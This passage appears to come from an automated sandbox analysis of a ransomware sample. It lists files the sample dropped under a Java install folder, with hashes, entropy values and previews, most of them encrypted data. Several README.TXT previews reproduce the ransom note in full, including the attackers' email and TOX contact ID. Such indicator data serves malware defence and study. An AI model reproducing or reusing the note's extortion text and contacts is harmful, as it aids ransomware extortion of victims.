                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\calendars.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2090
                                Entropy (8bit):7.908229248728333
                                Encrypted:false
                                SSDEEP:48:5IUXamnvvC4wBGsirnKBpY4UiXjTARxwTwV2Lp8cx/WyYu+MAVMJg6Tz:VpZwgsirKERiXvAROzrxevuAVOz
                                MD5:2DA67F3B772A06B2C0BB4D8929E8B84B
                                SHA1:8EA26C8DFC918E74B0D1B02FF3B407DFEC3C87EC
                                SHA-256:8D7AD3F3D22C3B2A7F924C60492BEEC5CCEFBCC39142FF9099CF2D3D028FA1A6
                                SHA-512:29BBFAD49C22B08176D82E0706F5D6C5E10478B9402996EFD45A3D7FC5654B97C884012D37DBD6F16B7C2C6E440C2AC7497E1B246B2625E537F3F43F1841112C
                                Malicious:false
                                Preview:q.w....t./]Hn-"6#.Y..E..r..$..Uy..W|......L.p?...*.... p...-..-f.\._.g.~c...^...?.2C.#......3..OP...(j.W....beu..=.e..).z2Q'..y^.w4. ..q.._V...q.?.L}'...@.f.).../......}...l...dXd~B.@I...O.Ou5........1i3.....E.$.....E....F.......\$_1.X.<.F.O2....rADH=...w......%......rX..aDH..(.....e|..^u.1.....?.....sN.....W.....n......0.....^..i.....:...S1.....kP.........2..z.{A....I.&,k.7..cpH!f.z..Yf.......Jq.V.OJY...........6...*3!.6...~....u.A.s.....!X..."...G..;..#.8...^.6....6...^..BPoTpb3.M1....&.....=.o....K......Q.=..o...........;^`...i...A..b3..pW.2cS.n..|...GS.2+....s....r..o. ..(w...=.....6._.Rk.r..|.c..Ro..L...a;$...^.z~.....V.?..hc=P.m.y.....D...%...EU.....3.:j.......B9.9..\q/`.:...e.........g.L4:.t.[.sP....v1q.`n.CGk.?'.g.@".`rD....5...&....F{Tv.6p.#. .....R....6._he...s....n3r\....gU......T.e..+...)...h....78lSqI...y.Pj.F.. ..:...v. .|..t.#..$4../~*.".+..LR'.8.6.H.Bj.:..r.....].....].s...-$.....1..a.3w..5v.....W|E<....Z.f..^Bc.Y._y\.98Y$-.

                                C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3040472
                                Entropy (8bit):7.181838696273676
                                Encrypted:false
                                SSDEEP:49152:taAiTtSBz1nEJOOUJbn2RZQVPxS7+EXdnvv8/2fo27:taAiJmzNzt72PQG3n3s2f
                                MD5:EE701AFBF3468FDC335F378E5070D004
                                SHA1:D04600DEC7FAD6636FDF6E5B4DB9E8E40270F227
                                SHA-256:41DDABA0BEC5EFCE33250AD8500C43EECCCF6F747F82DB209C3C2E4B92F39718
                                SHA-512:8657353BE742B3EB2B724FEF3B18E8611367B9615593BE891B84C292D90BE46EDDA3CF7ACF230A35A7D14916626C14D3AE0E9408384ED3A67FE96832A0E9BBD8
                                Malicious:false
                                Preview:...7\*(.i.I..^.A9"I...(....+\......D......S.e.......\!.9X.-..!u..j+5.......W.Q....n.....b. ...7."...A..*.}..z'a.<...~.~q..H.....T_s.6].{.P.#...."..>.|y..X..|a..k..`...pz...d&v..C..'...{D....V.HN.....W<..H'...{...."I...;..`t.c".....m....+.Q..~..]./\l.pE;A?..O....m.X#3e.H._O...Ap6:!r...+.lM.;K,...q..j....+.N.....N.!...A.......#.hE...U...H........1...X0.7.g.f....B...cp.-.V{...}.<....^.rM}?-*...,n........7..H.V.C...%.H..8.Dd.}........'..6..h..OW...V(.....f...`.....9.}.(!.%..J..p..#......[..........."...#.5.I.....d..~.v..O.9.(..m.fT3:........L.....z@@.C...%.1._.*_+;..<.:.f...q.'~.r.D0......;.....O..C.[.....cM...$.N.kwS.An5.dr.OR.^..q............d8W.P.?.0..x.R..Wm>.!.....a.JxX.".,....h..WV.F ...I8......N..O.?V.....H[o...0KR.o.d\...2..f...N.@.r\.4..!..o....b...9.e......@@.............Br..p..%q..E..I..q..Ee.;......J.;.....>.7$7.P...a.U..Un\MR....{i#a.`...Q|..w@.....8.F...^..l1E..y<..V.j.wW...C..q..A....l.U.ea-....TK...C..uZ.$...qE.7..l%..%...

                                C:\Program Files (x86)\Java\jre-1.8\lib\classlist

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84963
                                Entropy (8bit):7.997642145601273
                                Encrypted:true
                                SSDEEP:1536:pW3h/t8bGwU7Wu/z70dnDU7l3Yxz8TilOcTAArVKSoyje6YJsK4XFYB:Q3h/t847VLYpU5384aTrrf1VE
                                MD5:FE0AB951DB91111880CEF95179F01CD3
                                SHA1:0C7DFA136D0E935B9148DE7F92B1CDCA76B8472B
                                SHA-256:C7167DFACE786CE2E45F5D667283B977DBF058CBF0437F3A411E80447720E2ED
                                SHA-512:9A36CB05303B2C608C9D0989EE19D72B0A18D3C67A95BA777D5DECBD3AEEF1EA888EB8CD3A2E96E62427968238891B0D94080283CBB9C6C702073FDAD272D704
                                Malicious:true
                                Preview:.V......e`.B....P]Fd..u..T.;"...mK.V.>k...n......N_..j.....J.w..p.B`%.k~Rg.......h....1....~.|... ..d.*..Y...V.....k7{...uy.r*ey.'0..#.i...aTQ.-vC..ew.....2.D!...k..j2...k.........*.....Z._X..xE..0.....~.2Q.S.%&..,K.'E.{....}..K..x....5.;...%%..G%..c.U...W.{..[.P.DW....25.6Z..j....n....C.2.l.aP-.i..P.U.F.[jT..G.....T*obe.,1....C.K.u .P.../Z'.*.SQ~...._:.^.S.g....vQm_.?sd...x.....F.1......Q.h$U.8..*...t....+n..l......A.%d..FN.^y.....EF..?.Lo...kj..)...(.Fy3....y7_...EY]..N{...N..&@.......;...._k........7.1...E..W7..,6.;.T..~.Q.).W..2..%....z8[D.(q.w.!7!....+.+<H>g#..*O...?.'A.(...x..@......<L..qG.z.;\..J.D......P.>>.+-..*..FS..;....fyeP.;......7.#....hF..R.v..;..`.....g.]..c(..,'.{.1.........LA.....@....v.F.b..z..vK.c&..H...1.d\l.zN....7l6.jJ...j^S.ZoA....jC..S.2..o....x.Q.H9.sMx......WQ.vI.g9.f..9ck.S.../...]..u..L=....r..uso.......m.".sM.o/9-S}..r..H.X...'....:Q.XW....l..Kp.j*..!..^..n.{.`.t _(.....}...j.......A.....jgEZ6Z.u.0...HV..[a.m.....

                                C:\Program Files (x86)\Java\jre-1.8\lib\cmm\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\content-types.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6156
                                Entropy (8bit):7.970817282685435
                                Encrypted:false
                                SSDEEP:192:DOrkxXJXnvkM0fKeRZQVe8q2PRGI+xDD2+VOu:qreXJXXyQk8qps+VOu
                                MD5:E72DCB85914526F307FBFF100CC4FEB7
                                SHA1:810AF6545230655479D3038BE5DDF30139C16E6D
                                SHA-256:75B2100934A14590745F386F7602F404737C413D22EE4BA0D4BAC430C4FA4D76
                                SHA-512:43DEEE0DE646DD836DEB63A40B0B66EDD79D3A074ABD8C7896C32CB182E1417120FA69AB6DEA4119A51BFCFFE513FB4450FB1770AA42389B3DDAD7EE68C8770C
                                Malicious:false
                                Preview:O...q.(..1.n..s...<.UW.8U8.H..A...C.....~4..c..K>...qnN..n..v.q..~. .....R....-jG.i(E......R.$...2..P.^.6T....Jw...)....@.pAI......./....1.....m3....C...*V...!k.Z....R.x%....Z..............&...v......7.=.....[.z..f..3....P...l...B.U.ls.>...bkNZ...>..K..W..?......../..,..*....4....5.t......o..!....eJ=..m........._Z.S.I8g....D...I.^*a..M...K.t.....A+I....PlK.)......S....w...'..^,......+.....ce...\|..\.p3.L....v.q.....F....).(J-...;....3.?....- U.....T.....6 .......m.Z...b.2........j+.........>.g..K"ax1....T'.U.\..t.f"....#..@...}.~.,.d...}.s..L..v...Bh..@65.Q.|.......'..:.....1.!....s...ZX}. .m,..-.....q1.J..Y$.!9.I........w.0%P...5.*.....s&...;..\.D3v.lV.d..M..........d.t...!vs..G.....3.lU..|]....F..^.X0..P..K....n."a...Zk5....B~;O..Vb-.eU@...yWa.L(.k.K....=wG....h....fb.z....G.z."a.W.^.zo...Ga.Yz...1UB....F..p........c.....S........R.n...........{....o...=R'.O...f.?.@....4;k..C4E!h......U/x....U.....m...(........[.q.C0....mc.w/Q..R/RX,...G

                                C:\Program Files (x86)\Java\jre-1.8\lib\currency.data

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4780
                                Entropy (8bit):7.962269785186108
                                Encrypted:false
                                SSDEEP:96:8Vxv+yDdlKd2/iFzN+ZdUYOz7FpAVHUqFQqZJg+X18KrJ6e/y3R7evuAVOO:S+FWmz0Zvo7FyNUqFQq/g018WgeO+VOO
                                MD5:F24F5D1C4A5FA3FF74A530280E5CCB01
                                SHA1:966D74303C8BC8F31FA4F0FF4550D0976331AA8B
                                SHA-256:2C5E9331D4A538FB4B0B406690DEB227513555C69BF505B543CC2F0F55B47DE7
                                SHA-512:012D4B09CB716425DAFDD932D0D6AA28772F5E70C3736D100F1E90B0A7CF1BAA0768DD5F59650C322CB41194905BF429C60E93EC821102279C399016176AAA91
                                Malicious:false
                                Preview:g.R?...E...v..o.2..W%.......*.b.........O.I.6.W.%.....6.@q.......4.C...{...5}zU\...a.E&..d....m..%.K.n...}...d..x..Q..7.&.gF......Ti...uL.i...........W...d..........v....ny..t.f..-.M.D..P.<........Y.QeFq....m.(s..%fp.+..Z&/....[...-..)^E..`U#........0.Ga..U..zl;.CP..cs..P.$e..R....}.p.k...N.qL.A.w..%.L.n.6Z...z2YI4...Q.5....W......66...._5..>..#....|n...i..e..j.J0.....i./\...O......1.0._..,D.X!K...Gh4vmU.......*O.._....U.<d.CW....G.....F..&e.(...iG.......}......X..:R4..o4.S(A.e7....V.> .3..j.X.uW..e.t^%..I.Xn..hW.z<`...........P>.Q...Y.4..;../.;H. V?.....P....|.......nb..7...&Kd....!.2...xS.>....5.-....q3..S8.9...[pf..c.z.Y_U.....pZ....31..g._.... .]Te...z....G1.........2o$...r.f.9.J..3..r].{+...d$.T...].^.`6....(..qP@!....U...A\..8...=..1.D.xmUhv....,C.#...U ..!8..=au.!..#.[....[.c....FT.uJU[...3.(M!.]..~S..79.....iw..SY..$..]Y.z.]X.8.z...Z..]...j.d. .*.u.V.'..k..)............8/x..rj...........F...IS9,H{G.pU....[...Uy....8.b.W.

                                C:\Program Files (x86)\Java\jre-1.8\lib\deploy.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5057623
                                Entropy (8bit):7.176136538023316
                                Encrypted:false
                                SSDEEP:49152:qSY8nhXihl3RJESJ+vH8wi7pmm6q6dlnwT6HYHNY8AFEr7eDCJtL6n:nY8ntifHd+xlnFC+DCen
                                MD5:0F54581D2339F6B7D6D6264127DAAD45
                                SHA1:97ABDAF7730DF2A4B96E29123F905E4FF8644CDB
                                SHA-256:FC07F3A6DB2391E8C6CFF1B08CC154D0A5A573D02A3B93356F473379E4B03E84
                                SHA-512:A8E8FA7025186BF58676CEB7B3F5962F0F132C3932D45207229455B154849B5039416A68245D672DFCE573073D225BACD192C5824C3D86F0E7672DCF43A7A31A
                                Malicious:false
                                Preview:>...y.JS.d?V.rzH...zz..[....`.4>....[..h......6.....T.^W.........~.;..y%....z...-.........]..K.i3$.../.I.C..........~r*.].Coh....S1D..c\.1.UTJ..d.&..LA./.......C....U.............F....&.<....sJ.A...xMr.'=.]DH.....U+.,.Si....~-.....N.q+O.+w....9..<...T.W..6.(.&.).Z.JJ....g..{.w].#L..............B.Mj.b.....f|.r{.)...@...BC.2.&...D.t7u.-.C............?.1(..8"..z.%.-.S...z)N.....&.....T.n.>.y..Q...h..F...%....C|.'....(.!B.m.[.NU.Z.8tvzl~S/......^>xiJ|W)<.7L...v.f..).p..F..|1y.)...L...].eDK..E..^.~~..vca({a~o.u..~.m{.N..<.?.......3..C....~.'&.../l..t6..'q..p.......g..S]...W\.......v.b..:/..........G....._.0m-7R"P.Q....r.FR..Lp.y.F\..\.k&W!.z.m..7.....i....e..{\......lS%)A.A.....m...OA.R..5..........Xq...f=>d..;....\..AI...-KI..Ml..y......e.]....N_.u.....3.....u...-.PI.a.1..\Z...S.R.ES\\..".WO....[..c..'. ..p.G.)V.c.C...2..!.....Z...).o.I."..M'O....@s..]...ZFa.I^CC..F@....Jz..D.p..MLV.....l. ..~...s.# "!.....a.z....+>u@...+..x..+..

                                C:\Program Files (x86)\Java\jre-1.8\lib\deploy\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\ext\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\flavormap.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4536
                                Entropy (8bit):7.951694197960495
                                Encrypted:false
                                SSDEEP:96:Cp7/wwxmJVKSsCYJOb7PdEU6TDXzZocRogIYGkUPq2hZcevuAVOm:Cp7/wwcVKSUJYDsTD9ocjIYnkq2hC+V7
                                MD5:4AC267C53D52802C4B8F4AA92B0C9036
                                SHA1:D13458492CE1184E28E42E5D844550329FD382D0
                                SHA-256:3FE33D986B7C83DAF393A8005EDA5F5BC7B962B27881046773170BEAA073F2D0
                                SHA-512:34AFA55606A5BD2A705284CC8C6A4F802819AA4C92DB3745061803F141DD06BE66FFF726409FDE7D60EAF223CAD8F2882599E4E44EA07390996F291F4C5D9370
                                Malicious:false
                                Preview:.......G.S3......}.q#....RJ..eE......h......j....Qw.^.oc^....bd!.. .M.]mH&.U......w#.E..w...}.....5. P.......U.)..H.....^..L.M~........F.....y/.......,...pbz...,Cj...*.C!.8 . aa..<I..>..S".6.H".v.....re.A.S.[....Fs>";.+.:)a.?=.\.....q$@...w.FE....e.8T7..K...EOp.'.L.B{*.:|..i...<9...DH'...5Hj.0f.....a{*.f2hmh..R.7B...I.qa.....ZW.[.q..7...rR.)...o.....k$T.8.(..`........5..*......qO.*D!..Hd.R..AV..4$.6..%...D.....`........jb.q....[bZ..!x.>.Y..(..~s.....<Nt|'.y...]6.......d......`.G.......w...?.}.I.....$W...`.....}.;..F.I8f.x}.3...&.ju.K#.<.........8...t.....|.V.. .*.5^..E....B.?.k.&n.......}n..C.&.g8..v.j.....u.O..oK...h.~?6[.....:5.........r.~Ii....T$D....w...-;..W..e.UI.4.$.e...}@m>..n..o.9X.....VcC9V..=.uX..Y....?A....m.@L).4..r...........R.z}.E.....,F....<.[.q..l.T...Ri....9.u!]."...h$1.....4z...Z.Kr._c..L...A.A............e.,..]..@........m...]5!....P..>..>.(.0.......Lt.H....X6$_....8)........^o..v\S|.xT~.C.L...P.4..^.sm.;.Lb

                                C:\Program Files (x86)\Java\jre-1.8\lib\fontconfig.bfc

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):4386
                                Entropy (8bit):7.961941819748066
                                Encrypted:false
                                SSDEEP:96:PD+6mF0K0/f2knAu6BUaZVTuqghLrzarb7KcZevuAVOn:C62gl6BBZVTuqSDaH7KcZ+VOn
                                MD5:1DBB665A8B7B813F0B5F6A949DFB97E8
                                SHA1:A245F659D33137B1FE5A482DA350B8E380DE81A8
                                SHA-256:8014AC41F95D80CFCE8814FF993701D38EBCE939B1D55EFD516C48A6034B00BA
                                SHA-512:8ED3FD57159ED1D00BDF5F79B911613A84A68F362A81787CA6C055CDF2727B3A423B049289B3919188E7FFCE44537A13D7212E8E05CE3E677C907C326BD4B4B5
                                Malicious:false
                                Preview:.{...qm).&o...?.......V_..Ly..~M.....b..d..-Q..>......)...S...1%-.l... ....&.,V...u.|^c.(l`U....9&.>.'..\..B......&$.1.vCM&=....x6.>..7k.i].<.X....df71..He.....=.t..1.5m.#F.....Fb..=.W ..E./.z..#.E.2M... Zx.Eh.$,S:....T....&.8<.u.`..5.....D8p.N..OF=A.L./{Q|j.*.\......*U:.F.5.1....?.....W_.>tw.ZL....!.m....-......:..j..(..e.=......}.".....Ui.......2...../.'.I.]fy......2..4...Z.....#. ...:lv_/..~.,.............`.6.X.^........9.d...]....t.T.;.`..x.I.e....v.<.V.K.*..}.0.... ...zfa2......,.6.i}.e..'8zTN]Fp6$P.#oH...ea\.w..H$..+e....l...t.<_uySn..ds.5.|.s.0......?c.z.....n:6X.[.8xb.H...u...5/...ty..Le.......r....O\mNO....b0.........r.........d\.e.RSL...amsX..GkJ..3.^..'...+....vlCE..G.....-...6.X..r.}..........H......N..'..y():p.2.F...."V`S{.....~.N..#"x....n.....aA..Z.........T$..f.....{,9$m@$.h:J..$....#........!l....p...r.}.,0<_..<+.p.O....h3..@...6.j........~..2..J.z0..X.M\..(IN/.]wM*....`.l.T$v.j.c/..e..=\.=....u.........v..L.h..2.......dQ.

                                C:\Program Files (x86)\Java\jre-1.8\lib\fontconfig.properties.src

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11186
                                Entropy (8bit):7.982934220941608
                                Encrypted:false
                                SSDEEP:192:+NI702cN8CCWePl8Xm3KM+QDrH4V7l+OpOMZuGA3rk5jK9WK4QfUkHkhUfjpt37j:eMAePM0KNQDTO7AQO+3+8K9WKbRkSrzf
                                MD5:4FF2BDEA1A10678223B0B26106D9CF24
                                SHA1:BA9CC7C4D5EF74F984408398C061E95E3203CCF2
                                SHA-256:DA2373436906972D17404D0BDFD75E47D4839ABB954D59E30658FD891D25E44D
                                SHA-512:9CD4F026A923D1536DEE8EEEAAFFBFB1D45930D763E13128D79EFD5F796D293912666D1A2B8808FA1B9B246EC00008F59BF058003A00B8B1A57DC606F60BEA34
                                Malicious:false
                                Preview:@#0~..]...H.X..^.<..L..>e.cM)....t.6.e..3..(2tj....Z..<..(_I....?....&.B.e..!.C.+..X....A+WB.s>...G8......g}Qc3J.DI....C.5.$..|....K<.-]yrpM...v..f..........O.C/..X..J...e.my...a.....")...n.j%_...)..z...."^....#.vJ..h.J..S....p.-.:aR...M.H....G..QWM........q..6FB....J.*..Ogv.Q;....S.=Sm&.Y..P......*....+..O...AW.s. J...b.T:.&.....2CxF...R/...d.D-.%*v.k.sx....^Y.....t..<^....*..8)Z..w.7..N.o.........D.K......v.X...b....R....lC...X..9..1.).u]...1.:...6mU....{.../.|..&.d.;......{.%..?...n.s....rj.p\8...$........NDO.....N.o.0X...tl.V..52].. ......Gkw..1~....m.s.....1.....Z.|c.8..n6{.....s.K...GxDin...Hq..`*..]D.n..A.(.2_...........F.....|.(.!.a`.A4.. .S.......lTg.c'.E..gAE...[..#....j.|./.......6..9..\~:hv.....f.._.E.;..........}R.}\...T..Q.....n..N.a....Ai....M.....:L.<Y...d&^...`.<.y=.(..v.p.....+.Yv..o4...T..S..Qg...1.1.K[..P....+.x..f$...y.M...//.../.M.Qlr.....j.&S.P..5w....q.}....Q......%.{...M..1`.l..4. 8..#H....@.8.r6.Cc..4.00.h.4.

                                C:\Program Files (x86)\Java\jre-1.8\lib\fonts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\hijrah-config-umalqura.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14570
                                Entropy (8bit):7.987220077995155
                                Encrypted:false
                                SSDEEP:384:jiDQE9lvFW0QEDo6mP7s9UqPddlCxX63yWaJzMw+VOA:ODQElB07smwHfydp8
                                MD5:488612BC3597392B442D858A2571A396
                                SHA1:A9A63A4FFA4451D4C54152C6819D0F67E79E469F
                                SHA-256:92802D6A2D1DA0FAD81C4F7BD39CCB1CA8DA289C2A570F6ABC5D902ECFA86A31
                                SHA-512:AEE297B3526134CCAD0E8A416619011EBF2F6C0DE2E5C4A4F4AB072591F6F8949EDB00179D455B7DD5C1423FAEF56FEBF060F598B1999E483E585A314B142408
                                Malicious:false
                                Preview:.qz.e.Y.:......@.....U......2..lj..~.Qs"...1.qt...i,.....QW.....r-.28$..Mp...5.c.gN.y..6(.[..5$U.(%".%-.6.....k..%./).y...Y.-.....+klq....2..$....\]#..2x./.X..s......+.......R.........C.."2....>.N..q.Ee....]#..E.....f:..".....u.....%I....rzS..>Yi@....86!y._.Np.T....\#..T..Y..,[6..X.+b....s.v....J8..!Sb.Z..$.9.Y~=..B.9..w1.$....w1W.v.B..u...|.E\..r}...U..{...ok|...E....^.$...|x1.M....m5..\..9.Z..Kc V...D.G....(_.....D6...K..d.H`&i.5.:..;...s.s...h~V.zI......k..t.F^...l.........~.~..#.u..en0..<.BJ,'..x.&..F<.q\.e.e5.....>......G.U..q)r.Q..*.A.q..k.0..<V..>K6.B..L.{..h:......EV$..z..l...TL....I9SG.$...3..K<....y.B...H..'Q.!z0.=r.c....6..8.......c..u.T..l.Z....:...7...`..@...(/.?..ZQ.G.@./.Lah3...No`u.H..C..\.v.=....B.j.3...K....Q.f....).}5T]1j~.....$(|.v......._l.|.]....1k...Ya...(..2...z..I.....0..@.W...w..j.......o..H.#l.,.9.J.k....d.#..C.ke",......`.,U.X......!..3U. ..w..S..].K..:5..Y..y......c[\.3..gwU,..=......J5. .Cw...?}...

                                C:\Program Files (x86)\Java\jre-1.8\lib\i386\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
